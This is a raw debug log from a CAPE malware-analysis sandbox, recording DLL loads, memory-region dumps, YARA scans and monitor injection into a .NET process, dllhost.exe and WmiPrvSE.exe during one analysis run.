2026-05-28 19:26:29,853 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73BF0000: C:\Windows\System32\UMPDC (0x12000 bytes).
2026-05-28 19:26:29,855 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73670000: C:\Windows\SYSTEM32\cryptsp (0x18000 bytes).
2026-05-28 19:26:29,856 [root] DEBUG: 12824: DLL loaded at 0x00007FFE71270000: C:\Windows\System32\dsreg (0x141000 bytes).
2026-05-28 19:26:29,856 [root] DEBUG: 12824: DLL loaded at 0x00007FFE63270000: C:\Windows\System32\cdp (0x4d4000 bytes).
2026-05-28 19:26:29,857 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5D2F0000: C:\Windows\System32\TaskFlowDataEngine (0x17e000 bytes).
2026-05-28 19:26:29,862 [root] DEBUG: 12824: DLL loaded at 0x00007FFE64F60000: C:\Windows\System32\OneCoreCommonProxyStub (0x7f000 bytes).
2026-05-28 19:26:29,869 [root] DEBUG: Error 5 (0x5) - OpenProcessHandler: Error obtaining target process name: Access is denied.
2026-05-28 19:26:29,869 [root] DEBUG: 12824: OpenProcessHandler: Injection info created for process 4712, handle 0x494: Error obtaining target process name
2026-05-28 19:26:29,919 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5B350000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0xaa000 bytes).
2026-05-28 19:26:29,925 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5D810000: C:\Windows\SYSTEM32\VERSION (0xa000 bytes).
2026-05-28 19:26:29,938 [root] DEBUG: 12824: DLL loaded at 0x00007FFE1BFE0000: C:\Windows\SYSTEM32\ucrtbase_clr0400 (0xbd000 bytes).
2026-05-28 19:26:29,939 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5C060000: C:\Windows\SYSTEM32\VCRUNTIME140_CLR0400 (0x16000 bytes).
2026-05-28 19:26:29,939 [root] DEBUG: 12824: DLL loaded at 0x00007FFE1AE50000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr (0xb34000 bytes).
2026-05-28 19:26:29,987 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBBA40000, size: 0x1000.
2026-05-28 19:26:30,000 [root] DEBUG: 12824: hook_api: clrjit::compileMethod export address 0x00007FFE1BE95FF0 obtained via GetFunctionAddress
2026-05-28 19:26:30,001 [root] DEBUG: 12824: DLL loaded at 0x00007FFE1BE90000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit (0x14f000 bytes).
2026-05-28 19:26:30,008 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBBA40000: scans and dumps active.
2026-05-28 19:26:30,009 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007DF4FAAC0000, size: 0xa0000.
2026-05-28 19:26:30,009 [root] DEBUG: 12824: GetEntropy: Error - Supplied address inaccessible: 0x00007DF4FAAC0000
2026-05-28 19:26:30,010 [root] DEBUG: 12824: AllocationHandler: Processing previous tracked region at: 0x00007FFDBBA40000.
2026-05-28 19:26:30,010 [root] DEBUG: 12824: ProcessTrackedRegion: Entropy for tracked region at 0x00007FFDBBA40000: 5.772868e+00
2026-05-28 19:26:30,011 [root] DEBUG: 12824: DumpPEsInRange: Scanning range 0x00007FFDBBA40000 - 0x00007FFDBBA4741D.
2026-05-28 19:26:30,011 [root] DEBUG: 12824: ScanForDisguisedPE: No PE image located in range 0x00007FFDBBA40000-0x00007FFDBBA4741D.
2026-05-28 19:26:30,013 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\12824_9507630262328452026 to CAPE\c3549ec776d71fb2acb22b54ce2498a253825bc2483e600e795cfce8b0215509; Size is 29725; Max size: 100000000
2026-05-28 19:26:30,015 [root] DEBUG: 12824: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\12824_9507630262328452026 (size 29725 bytes)
2026-05-28 19:26:30,015 [root] DEBUG: 12824: DumpRegion: Dumped entire allocation from 0x00007FFDBBA40000, size 32768 bytes.
2026-05-28 19:26:30,016 [root] DEBUG: 12824: ProcessTrackedRegion: Dumped region at 0x00007FFDBBA40000.
2026-05-28 19:26:30,017 [root] DEBUG: 12824: YaraScan: Scanning 0x00007FFDBBA40000, size 0x741d
2026-05-28 19:26:30,018 [root] DEBUG: 12824: AllocationHandler: Memory region (size 0xa0000) reserved but not committed at 0x00007DF4FAAC0000.
2026-05-28 19:26:30,018 [root] DEBUG: 12824: AllocationHandler: Previously reserved region at 0x00007DF4FAAC0000, committing at: 0x00007DF4FAAC0000.
2026-05-28 19:26:30,019 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007DF4FAAB0000, size: 0x10000.
2026-05-28 19:26:30,019 [root] DEBUG: 12824: GetEntropy: Error - Supplied address inaccessible: 0x00007DF4FAAB0000
2026-05-28 19:26:30,020 [root] DEBUG: 12824: AllocationHandler: Processing previous tracked region at: 0x00007DF4FAAC0000.
2026-05-28 19:26:30,023 [root] DEBUG: 12824: ProcessTrackedRegion: Entropy for tracked region at 0x00007DF4FAAC0000: 1.759065e-01
2026-05-28 19:26:30,023 [root] DEBUG: 12824: DumpPEsInRange: Scanning range 0x00007DF4FAAC0000 - 0x00007DF4FAAC0066.
2026-05-28 19:26:30,024 [root] DEBUG: 12824: ScanForDisguisedPE: Size too small: 0x66 bytes
2026-05-28 19:26:30,031 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\12824_44711130262328452026 to CAPE\8e1174c750c79939c42f1074748e47310a714d5fa1e1774897a4c671e8e93e84; Size is 102; Max size: 100000000
2026-05-28 19:26:30,033 [root] DEBUG: 12824: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\12824_44711130262328452026 (size 102 bytes)
2026-05-28 19:26:30,034 [root] DEBUG: 12824: DumpRegion: Dumped entire allocation from 0x00007DF4FAAC0000, size 4096 bytes.
2026-05-28 19:26:30,035 [root] DEBUG: 12824: ProcessTrackedRegion: Dumped region at 0x00007DF4FAAC0000.
2026-05-28 19:26:30,035 [root] DEBUG: 12824: YaraScan: Scanning 0x00007DF4FAAC0000, size 0x66
2026-05-28 19:26:30,036 [root] DEBUG: 12824: AllocationHandler: Memory region (size 0x10000) reserved but not committed at 0x00007DF4FAAB0000.
2026-05-28 19:26:30,037 [root] DEBUG: 12824: AllocationHandler: Previously reserved region at 0x00007DF4FAAB0000, committing at: 0x00007DF4FAAB0000.
2026-05-28 19:26:30,038 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBB87D000, size: 0x1000.
2026-05-28 19:26:30,068 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00000243B1BB2000, size: 0x1000.
2026-05-28 19:26:30,070 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBA40000.
2026-05-28 19:26:30,096 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBA40000.
2026-05-28 19:26:30,097 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBA40000.
2026-05-28 19:26:30,107 [root] DEBUG: 12824: DLL loaded at 0x00007FFE72DB0000: C:\Windows\system32\rsaenh (0x34000 bytes).
2026-05-28 19:26:30,194 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBB956000, size: 0x1000.
2026-05-28 19:26:30,466 [root] DEBUG: 12824: api-rate-cap: NtDelayExecution hook disabled due to rate
2026-05-28 19:26:30,480 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBBD20000: scans and dumps active.
2026-05-28 19:26:30,481 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBBD20000: scans and dumps active.
2026-05-28 19:26:30,485 [root] DEBUG: 12824: caller_dispatch: Added region at 0x00007FFDBBD20000 to tracked regions list (ntdll::LdrGetProcedureAddressForCaller returns to 0x00007FFDBBD22E14, thread 13428).
2026-05-28 19:26:30,486 [root] DEBUG: 12824: ProcessTrackedRegion: .NET cache region at 0x00007FFDBBD20000 skipped
2026-05-28 19:26:30,558 [root] DEBUG: 12824: AllocationHandler: Previously reserved region at 0x00007FFDBBD20000, committing at: 0x00007FFDBBD3C000.
2026-05-28 19:26:30,568 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB870000.
2026-05-28 19:26:30,585 [root] DEBUG: 12824: DLL loaded at 0x00007FFE765B0000: C:\Windows\System32\psapi (0x8000 bytes).
2026-05-28 19:26:30,611 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB870000.
2026-05-28 19:26:30,637 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5BFD0000: C:\Windows\SYSTEM32\amsi (0x1f000 bytes).
2026-05-28 19:26:30,645 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5BF80000: C:\Program Files\Windows Defender\MpOav (0x44000 bytes).
2026-05-28 19:26:30,671 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73F00000: C:\Windows\System32\wintrust (0x67000 bytes).
2026-05-28 19:26:30,673 [root] DEBUG: 12824: DLL loaded at 0x00007FFE738B0000: C:\Windows\SYSTEM32\MSASN1 (0x12000 bytes).
2026-05-28 19:26:30,700 [root] DEBUG: 12824: DLL loaded at 0x00007FFE72640000: C:\Windows\SYSTEM32\gpapi (0x23000 bytes).
2026-05-28 19:26:30,717 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBBED0000: scans and dumps active.
2026-05-28 19:26:30,717 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBBED0000: scans and dumps active.
2026-05-28 19:26:30,720 [root] DEBUG: 12824: caller_dispatch: Added region at 0x00007FFDBBED0000 to tracked regions list (advapi32::CryptGenRandom returns to 0x00007FFDBBED0D59, thread 12828).
2026-05-28 19:26:30,721 [root] DEBUG: 12824: ProcessTrackedRegion: .NET cache region at 0x00007FFDBBED0000 skipped
2026-05-28 19:26:30,738 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBBF60000, size: 0x1000.
2026-05-28 19:26:30,740 [root] INFO: Added new file to list with pid 12824 and path C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vmr1qent.dr1.ps1
2026-05-28 19:26:30,742 [root] INFO: Added new file to list with pid 12824 and path C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wx4debgc.txh.psm1
2026-05-28 19:26:30,753 [root] DEBUG: 12824: DLL loaded at 0x00007FFE1AAE0000: C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data (0x36c000 bytes).
2026-05-28 19:26:30,773 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5BE30000: C:\Windows\System32\MSISIP (0x15000 bytes).
2026-05-28 19:26:30,786 [root] DEBUG: 12824: DLL loaded at 0x00007FFE5BE10000: C:\Windows\System32\wshext (0x1e000 bytes).
2026-05-28 19:26:30,788 [root] DEBUG: 12824: DLL loaded at 0x00007FFE1A8C0000: C:\Windows\SYSTEM32\OpcServices (0x21d000 bytes).
2026-05-28 19:26:30,789 [root] DEBUG: 12824: DLL loaded at 0x00007FFE356C0000: C:\Windows\System32\AppxSip (0x4c000 bytes).
2026-05-28 19:26:30,794 [root] DEBUG: 12824: DLL loaded at 0x00007FFE6BC80000: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip (0xc000 bytes).
2026-05-28 19:26:30,806 [lib.common.results] INFO: Uploading file C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vmr1qent.dr1.ps1 to files\96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7; Size is 60; Max size: 100000000
2026-05-28 19:26:30,820 [lib.common.results] INFO: Uploading file C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wx4debgc.txh.psm1 to files\96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7; Size is 60; Max size: 100000000
2026-05-28 19:26:30,840 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:30,916 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:31,012 [root] DEBUG: 12824: AllocationHandler: Previously reserved region at 0x00007FFDBBED0000, committing at: 0x00007FFDBBF16000.
2026-05-28 19:26:31,694 [root] INFO: Process with pid 8480 has terminated
2026-05-28 19:26:31,695 [root] DEBUG: 8480: NtTerminateProcess hook: Attempting to dump process 8480
2026-05-28 19:26:31,696 [root] DEBUG: 8480: DoProcessDump: Skipping process dump as code is identical on disk.
2026-05-28 19:26:33,805 [root] INFO: Announced starting service "b'lfsvc'"
2026-05-28 19:26:41,502 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBC0B0000: scans and dumps active.
2026-05-28 19:26:41,504 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBC0B0000: scans and dumps active.
2026-05-28 19:26:41,511 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBC0B3000, size: 0x1000.
2026-05-28 19:26:41,518 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00000243B1BB0000.
2026-05-28 19:26:41,519 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00000243B1BB0000.
2026-05-28 19:26:41,519 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00000243CA150000, size: 0x32000.
2026-05-28 19:26:41,520 [root] DEBUG: 12824: GetEntropy: Error - Supplied address inaccessible: 0x00000243CA150000
2026-05-28 19:26:41,521 [root] DEBUG: 12824: AllocationHandler: Memory region (size 0x32000) reserved but not committed at 0x00000243CA150000.
2026-05-28 19:26:41,523 [root] DEBUG: 12824: AllocationHandler: Previously reserved region at 0x00000243CA150000, committing at: 0x00000243CA150000.
2026-05-28 19:26:41,585 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:41,603 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,611 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF60000.
2026-05-28 19:26:41,643 [root] DEBUG: 12824: api-rate-cap: ReadProcessMemory hook disabled due to rate
2026-05-28 19:26:41,643 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,658 [root] DEBUG: 12824: api-rate-cap: NtReadVirtualMemory hook disabled due to rate
2026-05-28 19:26:41,664 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,666 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,673 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,683 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,700 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,718 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC0B0000.
2026-05-28 19:26:41,738 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBC200000: scans and dumps active.
2026-05-28 19:26:41,740 [root] DEBUG: 12824: caller_dispatch: Added region at 0x00007FFDBC200000 to tracked regions list (ntdll::LdrGetProcedureAddressForCaller returns to 0x00007FFDBC200BC2, thread 12828).
2026-05-28 19:26:41,742 [root] DEBUG: 12824: ProcessTrackedRegion: .NET cache region at 0x00007FFDBC200000 skipped
2026-05-28 19:26:41,747 [root] DEBUG: 12824: AllocationHandler: Previously reserved region at 0x00007FFDBC200000, committing at: 0x00007FFDBC204000.
2026-05-28 19:26:41,798 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:41,815 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF60000.
2026-05-28 19:26:41,879 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBC2D0000: scans and dumps active.
2026-05-28 19:26:41,958 [root] DEBUG: 12824: DLL loaded at 0x00007FFE354F0000: C:\Windows\Microsoft.Net\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions (0x4f000 bytes).
2026-05-28 19:26:41,990 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:41,999 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,003 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBC370000: scans and dumps active.
2026-05-28 19:26:42,003 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBC370000: scans and dumps active.
2026-05-28 19:26:42,004 [root] DEBUG: 12824: .NET JIT native cache at 0x00007FFDBC370000: scans and dumps active.
2026-05-28 19:26:42,014 [root] DEBUG: 12824: caller_dispatch: Added region at 0x00007FFDBC370000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x00007FFDBC38EA57, thread 13440).
2026-05-28 19:26:42,015 [root] DEBUG: 12824: ProcessTrackedRegion: .NET cache region at 0x00007FFDBC370000 skipped
2026-05-28 19:26:42,016 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,044 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,072 [root] DEBUG: 12824: DLL loaded at 0x00007FFE64CF0000: C:\Windows\SYSTEM32\secur32 (0xc000 bytes).
2026-05-28 19:26:42,171 [root] DEBUG: 12824: api-cap: compileMethod hook disabled due to count: 5000
2026-05-28 19:26:42,172 [root] DEBUG: 12824: api-cap: compileMethod hook disabled due to count: 5001
2026-05-28 19:26:42,203 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBC5A0000, size: 0x1000.
2026-05-28 19:26:42,206 [root] DEBUG: 12824: ProcessTrackedRegion: Entropy for tracked region at 0x00007FFDBC5A0000: 4.070095e+00
2026-05-28 19:26:42,207 [root] DEBUG: 12824: DumpPEsInRange: Scanning range 0x00007FFDBC5A0000 - 0x00007FFDBC5A0CA9.
2026-05-28 19:26:42,207 [root] DEBUG: 12824: ScanForDisguisedPE: No PE image located in range 0x00007FFDBC5A0000-0x00007FFDBC5A0CA9.
2026-05-28 19:26:42,211 [lib.common.results] INFO: Uploading file C:\IlgkUEVfG\CAPE\12824_235913642262328452026 to CAPE\0cc234284146c0f7fe7eb49c30f840afe45adc9ac57fd68a48b9a230d7de33eb; Size is 4096; Max size: 100000000
2026-05-28 19:26:42,213 [root] DEBUG: 12824: DumpMemory: Payload successfully created: C:\IlgkUEVfG\CAPE\12824_235913642262328452026 (size 4096 bytes)
2026-05-28 19:26:42,214 [root] DEBUG: 12824: DumpRegion: Dumped entire allocation from 0x00007FFDBC5A0000, size 4096 bytes.
2026-05-28 19:26:42,214 [root] DEBUG: 12824: ProcessTrackedRegion: Dumped region at 0x00007FFDBC5A0000.
2026-05-28 19:26:42,238 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,247 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF60000.
2026-05-28 19:26:42,250 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,298 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,300 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,434 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,468 [root] DEBUG: 12824: DLL loaded at 0x00007FFE64490000: C:\Program Files\Windows Defender\MPCLIENT (0xe9000 bytes).
2026-05-28 19:26:42,512 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,522 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBB920000.
2026-05-28 19:26:42,597 [root] DEBUG: 12824: api-rate-cap: NtFreeVirtualMemory hook disabled due to rate
2026-05-28 19:26:42,598 [root] DEBUG: 12824: api-rate-cap: NtFreeVirtualMemory hook disabled due to rate
2026-05-28 19:26:42,644 [root] DEBUG: 12824: api-rate-cap: GetSystemTimeAsFileTime hook disabled due to rate
2026-05-28 19:26:42,669 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBBF60000.
2026-05-28 19:26:42,693 [root] DEBUG: 12824: DLL loaded at 0x00007FFE69C90000: C:\Windows\SYSTEM32\iertutil (0x2bc000 bytes).
2026-05-28 19:26:42,694 [root] DEBUG: 12824: DLL loaded at 0x00007FFE73280000: C:\Windows\SYSTEM32\netutils (0xc000 bytes).
2026-05-28 19:26:42,696 [root] DEBUG: 12824: DLL loaded at 0x00007FFE69F50000: C:\Windows\SYSTEM32\urlmon (0x1ed000 bytes).
2026-05-28 19:26:42,716 [root] DEBUG: 12824: DLL loaded at 0x00007FFE64920000: C:\Windows\SYSTEM32\FLTLIB (0xb000 bytes).
2026-05-28 19:26:42,717 [root] DEBUG: 12824: DLL loaded at 0x00007FFE65310000: C:\Windows\SYSTEM32\virtdisk (0x13000 bytes).
2026-05-28 19:26:42,732 [root] DEBUG: 12824: AllocationHandler: Adding allocation to tracked region list: 0x00007FFDBC910000, size: 0x1000.
2026-05-28 19:26:42,741 [root] DEBUG: 12824: AllocationHandler: Allocation already in tracked region list: 0x00007FFDBC5A0000.
2026-05-28 19:26:42,742 [root] DEBUG: 12824: api-cap: NtAllocateVirtualMemory hook disabled due to count: 5000
2026-05-28 19:26:42,742 [root] DEBUG: 12824: api-cap: NtAllocateVirtualMemory hook disabled due to count: 5001
2026-05-28 19:26:57,366 [root] INFO: Added new file to list with pid 4712 and path C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
2026-05-28 19:26:57,367 [root] INFO: Added new file to list with pid 4712 and path C:\Users\admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
2026-05-28 19:27:06,260 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 5148: C:\Windows\system32\DllHost.exe, ImageBase: 0x00007FF687D50000
2026-05-28 19:27:06,261 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 5148
2026-05-28 19:27:06,262 [lib.api.process] INFO: Monitor config for process 5148: C:\c6kogbu7\dll\5148.ini
2026-05-28 19:27:06,263 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:06,267 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:06,274 [root] DEBUG: Loader: Injecting process 5148 (thread 4672) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,275 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:27:06,276 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,279 [lib.api.process] INFO: Injected into 64-bit <Process 5148 dllhost.exe>
2026-05-28 19:27:06,280 [root] INFO: Announced 64-bit process name: dllhost.exe pid: 5148
2026-05-28 19:27:06,280 [lib.api.process] INFO: Monitor config for process 5148: C:\c6kogbu7\dll\5148.ini
2026-05-28 19:27:06,281 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:06,283 [lib.api.process] INFO: 64-bit DLL to inject is C:\c6kogbu7\dll\UgBHaqNf.dll, loader C:\c6kogbu7\bin\gJBJPJWT.exe
2026-05-28 19:27:06,290 [root] DEBUG: Loader: Injecting process 5148 (thread 4672) with C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,293 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2026-05-28 19:27:06,294 [root] DEBUG: Successfully injected DLL C:\c6kogbu7\dll\UgBHaqNf.dll.
2026-05-28 19:27:06,297 [lib.api.process] INFO: Injected into 64-bit <Process 5148 dllhost.exe>
2026-05-28 19:27:06,306 [root] DEBUG: 5148: Python path set to 'C:\Users\admin\AppData\Local\Python\pythoncore-3.14-64'.
2026-05-28 19:27:06,307 [root] DEBUG: 5148: Interactive desktop enabled.
2026-05-28 19:27:06,308 [root] DEBUG: 5148: Dropped file limit defaulting to 100.
2026-05-28 19:27:06,310 [root] DEBUG: 5148: Disabling sleep skipping.
2026-05-28 19:27:06,311 [root] DEBUG: 5148: YaraInit: Compiled rules loaded from existing file C:\c6kogbu7\data\yara\capemon.yac
2026-05-28 19:27:06,314 [root] DEBUG: 836: CreateProcessHandler: Injection info set for new process 5192: C:\Windows\system32\wbem\wmiprvse.exe, ImageBase: 0x00007FF65D570000
2026-05-28 19:27:06,314 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 5192
2026-05-28 19:27:06,316 [lib.api.process] INFO: Monitor config for process 5192: C:\c6kogbu7\dll\5192.ini
2026-05-28 19:27:06,317 [lib.api.process] INFO: Option 'interactive' with value '1' sent to monitor
2026-05-28 19:27:06,323 [root] DEBUG: 5148: RtlInsertInvertedFunctionTable 0x00007FFE766E090E, LdrpInvertedFunctionTableSRWLock 0x00007FFE7683D4F0
2026-05-28 19:27:06,323 [root] DEBUG: 5148: YaraScan: Scanning 0x00007FF687D50000, size 0x8026
2026-05-28 19:27:06,325 [root] DEBUG: 5148: Monitor initialised: 64-bit capemon loaded in process 5148 at 0x00007FFE34DD0000, thread 4672, image base 0x00007FF687D50000, stack from 0x0000001FE2AF4000-0x0000001FE2B00000
2026-05-28 19:27:06,325 [root] DEBUG: 5148: Commandline: C:\Windows\system32\DllHost.exe /Processid:{338B40F9-9D68-4B53-A793-6B9AA0C5F63B}
2026-05-28 19:27:06,336 [root] DEBUG: 5148: hook_api: LdrpCallInitRoutine export address 0x00007FFE766E99BC obtained via GetFunctionAddress
2026-05-28 19:27:06,357 [root] WARNING: b'Unable to create trampoline for LockResource, hook type 2'
2026-05-28 19:27:06,358 [root] DEBUG: 5148: set_hooks: Unable to hook LockResource
2026-05-28 19:27:06,363 [root] DEBUG: 5148: Hooked 627 out of 628 functions
2026-05-28 19:27:06,364 [root] DEBUG: 5148: Syscall hook installed, syscall logging level 1
2026-05-28 19:27:06,368 [root] DEBUG: 5148: RestoreHeaders: Restored original import table.
2026-05-28 19:27:06,369 [root] INFO: Loaded monitor into process with pid 5148
2026-05-28 19:27:06,370 [root] DEBUG: 5148: caller_dispatch: Added region at 0x00007FF687D50000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x00007FF687D512F2, thread 4672).
2026-05-28 19:27:06,370 [root] DEBUG: 5148: YaraScan: Scanning 0x00007FF687D50000, size 0x8026
2026-05-28 19:27:06,372 [root] DEBUG: 5148: ProcessImageBase: Main module image at 0x00007FF687D50000 unmodified (entropy change 0.000000e+00)
2026-05-28 19:27:06,374 [root] DEBUG: 5148: DLL loaded at 0x00007FFE71C90000: C:\Windows\SYSTEM32\kernel.appcore (0x12000 bytes).
2026-05-28 19:27:06,375 [root] DEBUG: 5148: DLL loaded at 0x00007FFE743A0000: C:\Windows\System32\bcryptPrimitives (0x82000 bytes).
2026-05-28 19:27:06,378 [root] DEBUG: 5148: DLL loaded at 0x00007FFE76420000: C:\Windows\System32\clbcatq (0xa9000 bytes).
2026-05-28 19:27:06,394 [root] DEBUG: 5148: DLL loaded at 0x00007FFE71770000: C:\Windows\system32\uxtheme (0x9e000 bytes).
2026-05-28 19:27:06,411 [root] DEBUG: 5148: DLL loaded at 0x00007FFE732A0000: C:\Windows\system32\logoncli (0x43000 bytes).
2026-05-28 19:27:06,412 [root] DEBUG: 5148: DLL loaded at 0x00007FFE73280000: C:\Windows\system32\netutils (0xc000 bytes).
2026-05-28 19:27:06,413 [root] DEBUG: 5148: DLL loaded at 0x00007FFE6D660000: C:\Windows\system32\dhcpcsvc (0x1d000 bytes).
2026-05-28 19:27:06,415 [root] DEBUG: 5148: DLL loaded at 0x00007FFE6ED00000: C:\Windows\system32\WINHTTP (0x10a000 bytes).
2026-05-28 19:27:06,416 [root] DEBUG: 5148: DLL loaded at 0x00007FFE72EF0000: C:\Windows\SYSTEM32\ntmarta (0x33000 bytes).
2026-05-28 19:27:06,417 [root] DEBUG: 5148: DLL loaded at 0x00007FFE751C0000: C:\Windows\System32\shcore (0xad000 bytes).
2026-05-28 19:27:06,418 [root] DEBUG: 5148: DLL loaded at 0x00007FFE73170000: C:\Windows\system32\IPHLPAPI (0x3b000 bytes).
2026-05-28 19:27:06,419 [root] DEBUG: 5148: DLL loaded at 0x00007FFE73CA0000: C:\Windows\system32\USERENV (0x2e000 bytes).
2026-05-28 19:27:06,420 [root] DEBUG: 5148: DLL loaded at 0x00007FFE73CE0000: C:\Windows\system32\profapi (0x25000 bytes).
2026-05-28 19:27:06,420 [root] DEBUG: 5148: DLL loaded at 0x00007FFE6F8F0000: C:\Windows\system32\XmlLite (0x36000 bytes).
